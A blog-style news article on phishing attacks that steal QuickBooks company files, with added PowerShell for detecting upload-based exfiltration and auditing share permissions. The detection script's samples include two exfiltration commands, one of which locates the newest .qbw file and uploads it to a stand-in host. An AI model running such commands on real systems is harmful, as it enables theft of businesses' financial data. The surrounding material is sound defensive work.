Experts Warn of Notable Increase in QuickBooks Data File Theft Attacks

According to new research, there has been a significant increase in the theft of QuickBooks data files via social engineering techniques used to deliver malware and manipulate the accounting software. “The majority of the time, the attack includes simple malware that is often signed, making it difficult to detect using antivirus or other threat detection tools,” ThreatLocker researchers wrote in a report shared with The Hacker News today. QuickBooks is an accounting software package developed and marketed by Intuit. According to the researchers, one form of spear-phishing attack takes the shape of a PowerShell command that runs from within the email itself.

Another attack vector involves decoy documents sent via email that, when opened, run a macro to download malicious code that uploads QuickBooks files to an attacker-controlled server. Attackers have also been caught using the built-in PowerShell cmdlet Invoke-WebRequest on target systems to upload the relevant data to the Internet without downloading any more advanced malware. “Regardless of whether a user is an administrator or not, a piece of malware or weaponised PowerShell will read the user’s file from the file server when they have access to the QuickBooks database,” the researchers said. Furthermore, if QuickBooks file permissions are set to the “All” category, an attacker can target any employee in the organisation rather than a single person with the appropriate privileges, which greatly widens the attack surface.

That’s not all, though. The researchers say they also found instances where the attackers used bait-and-switch techniques to trick victims into making fraudulent bank transfers by posing as suppliers or partners, in addition to selling the stolen data on the dark web. ThreatLocker advises users to be wary of these attacks and recommends that file permissions not be set to the “All” category, to minimise exposure. The same research shows that cybercriminals have been increasingly targeting QuickBooks file data at small and midsize businesses (SMBs) in recent months.

According to ThreatLocker’s findings, the breaches begin with one of two forms of phishing attack used to gain access to QuickBooks databases. In the first, the attackers deliver a PowerShell command that runs from within the malicious email. In the second, the attackers send an email with a Word document attached; when the recipient opens the document, a macro or link inside it downloads a file to their computer. When the executable or PowerShell command runs, it looks up the location of the victim’s most recently saved QuickBooks file, whether on a file share or on the local disk, and grabs that file. The attackers usually upload the stolen files to Google Cloud or Amazon Web Services as a temporary staging point, according to Danny Jenkins, co-founder and CEO of ThreatLocker. The data is then sold on the dark web, where other cybercriminals buy it to conduct further targeted attacks on other QuickBooks databases or on the victims’ customers and suppliers.
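The two delivery paths above, and the "no advanced malware" variant that just calls Invoke-WebRequest, all end in the same place: a script on the endpoint reads a QuickBooks company file and pushes it to the Internet. The following PowerShell is an added example written for this page; it is not ThreatLocker's code and does not come from the original report. It shows a simple triage rule for PowerShell Script Block Logging text (Event ID 4104) that flags a script block only when it both references a QuickBooks company, backup or portable file (.qbw, .qbb, .qbm) and uses a built-in upload primitive. The sample script blocks, the share name FS01\Accounting and the URLs are constructed for the demonstration.

```powershell
# Added example for this page, not code from the article or from ThreatLocker.
# Triage rule for PowerShell script-block text: a block is "suspicious" when it
# touches a QuickBooks company file AND uses a built-in upload primitive.
# All sample inputs below are constructed; the share and URLs are assumptions.

# QuickBooks company (.qbw), backup (.qbb) and portable (.qbm) file extensions.
$qbFilePattern = '\.qb[wbm]\b'

# Upload primitives an attacker can use without dropping extra tooling.
$uploadPatterns = @(
    # Invoke-WebRequest / Invoke-RestMethod (and their aliases) sending a body.
    '\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b[^\r\n]*-(Method\s+(Post|Put)|InFile|Body)\b',
    # System.Net.WebClient upload methods.
    '\.(UploadFile|UploadData|UploadString)\(',
    # Real curl.exe with an upload flag (Windows PowerShell also aliases curl to iwr).
    '\bcurl(\.exe)?\s[^\r\n]*(-T|--upload-file|-F|--data-binary)\b'
)

function Test-QuickBooksExfilScript {
    param([Parameter(Mandatory)][string]$ScriptText)

    $touchesQb = [regex]::IsMatch($ScriptText, $qbFilePattern, 'IgnoreCase')
    $uploads   = @($uploadPatterns | Where-Object { [regex]::IsMatch($ScriptText, $_, 'IgnoreCase') })

    [pscustomobject]@{
        TouchesQuickBooksFile = $touchesQb
        UploadPrimitives      = $uploads
        Suspicious            = ($touchesQb -and $uploads.Count -gt 0)
    }
}

# Constructed sample script blocks (not real captures).
$samples = [ordered]@{
    'backup copy (benign)'      = 'Copy-Item "\\FS01\Accounting\Acme.qbw" "D:\Backups\Acme-$(Get-Date -Format yyyyMMdd).qbw"'
    'report download (benign)'  = 'Invoke-WebRequest -Uri https://updates.example.net/report.json -OutFile C:\Temp\report.json'
    'newest qbw via iwr (bad)'  = '$f = Get-ChildItem \\FS01\Accounting -Filter *.qbw -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1; Invoke-WebRequest -Uri https://storage.example.net/u -Method Post -InFile $f.FullName'
    'WebClient upload (bad)'    = '(New-Object Net.WebClient).UploadFile("https://storage.example.net/u", "C:\Users\Public\Documents\Intuit\QuickBooks\Company Files\Acme.QBW")'
}

foreach ($name in $samples.Keys) {
    $r = Test-QuickBooksExfilScript -ScriptText $samples[$name]
    '{0,-28} suspicious={1,-5} uploads={2}' -f $name, $r.Suspicious, ($r.UploadPrimitives -join ' | ')
}
```

Only the last two samples are reported as suspicious: the backup copy touches a company file but never leaves the host, and the download uses Invoke-WebRequest without a request body. On a host with Script Block Logging enabled, the same function can be fed live events with Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}, where the script text is in Properties[2].Value of each event. The rule is deliberately narrow; it will not catch an attacker who stages the file under another name or uses a dropped binary, which is why the report pairs detection with tightening file permissions.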

Meanwhile, according to data from Barracuda Networks, 43% of organisations of all sizes have been victims of a spear-phishing attack in the last 12 months, and only 23% have dedicated spear-phishing defences in place. “The majority of the emails are invoices and resumes,” Jenkins of ThreatLocker explains. “We don’t have exact figures, but we do know that these types of attacks cost millions of dollars in cybercrime.”

According to Jenkins, accounting systems are often written without security in mind. QuickBooks has a fundamental weakness: when an administrator performs a “fix” on the QuickBooks database after a system crash, all file-share permissions can be reset, making the database available to everyone in the business. If attackers gain access to a device after such a fix, they inherit full access, the same as the company’s accountant or business manager. “People always ask how the hackers gained access to all of their customer accounts,” Jenkins explains. “It’s effortless: if they have access to the QuickBooks database, they have access to all of your customers.”
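Because a database repair can quietly widen the share permissions described above, and because the earlier advice is to keep file permissions off the “All” category, the practical check is an ACL audit of the QuickBooks share run after every repair. The PowerShell below is an added example for this page, not code from the article or from ThreatLocker. It walks an assumed share path (\\FS01\Accounting) and reports every NTFS Allow entry on the folders and on any .qbw, .qbb or .qbm file that is granted to a broad principal; the principal list is an assumption to adjust for your domain. Read access alone is enough for the theft described in this article, so the audit does not restrict itself to Modify or Full Control.

```powershell
# Added example for this page, not code from the article or from ThreatLocker.
# Audit NTFS ACLs on a QuickBooks share for entries granted to broad principals.
# The share path and the principal list are assumptions; adjust for your domain.

$companyFileRoot = '\\FS01\Accounting'      # assumed location of the QuickBooks company files

# Principals that effectively mean "everyone in the business" (assumed list).
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Get-BroadQuickBooksAccess {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Principals = $broadPrincipals
    )

    # The share root, every folder beneath it, and every QuickBooks data file.
    $targets  = @(Get-Item -LiteralPath $Path)
    $targets += Get-ChildItem -LiteralPath $Path -Recurse -Directory
    $targets += Get-ChildItem -LiteralPath $Path -Recurse -File |
                Where-Object { $_.Extension -in '.qbw', '.qbb', '.qbm' }

    foreach ($item in $targets) {
        $acl = Get-Acl -LiteralPath $item.FullName
        foreach ($ace in $acl.Access) {
            # Any Allow entry for a broad principal is reported, even read-only:
            # read access is all the theft described in the article needs.
            if ($ace.AccessControlType -eq 'Allow' -and
                $Principals -contains $ace.IdentityReference.Value) {
                [pscustomobject]@{
                    Path      = $item.FullName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Usage: an empty result means no broad principal has NTFS access under the share.
Get-BroadQuickBooksAccess -Path $companyFileRoot | Format-Table -AutoSize
```

NTFS permissions are only half of the picture: the share-level permissions set on the file server can independently grant Everyone access, so run Get-SmbShareAccess -Name Accounting on the server as well and look for the same broad principals. Both checks belong in the post-repair checklist, since the reset Jenkins describes happens on the file share rather than in QuickBooks itself.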


To summarise, this blog is here to help you understand the QuickBooks data file theft attacks that are increasing day by day. I hope that this blog helped you and was worth a read.
